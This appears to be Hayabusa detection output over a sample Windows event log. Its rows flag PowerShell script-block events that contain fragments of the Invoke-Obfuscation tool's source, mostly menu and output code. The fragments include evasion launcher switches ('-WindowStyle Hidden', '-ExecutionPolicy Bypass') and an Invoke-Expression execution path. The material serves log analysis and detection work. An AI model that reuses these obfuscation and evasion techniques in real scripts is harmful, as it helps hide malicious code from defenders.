$UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). 
If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). 
If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. 
Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. 
$Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains $UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). 
If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. 
Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. 
Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . 
((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. 
Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. 
$Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. 
Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. 
Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . 
((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. 
Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. 
$Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} # Output menu. Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. 
If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. 
If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. 
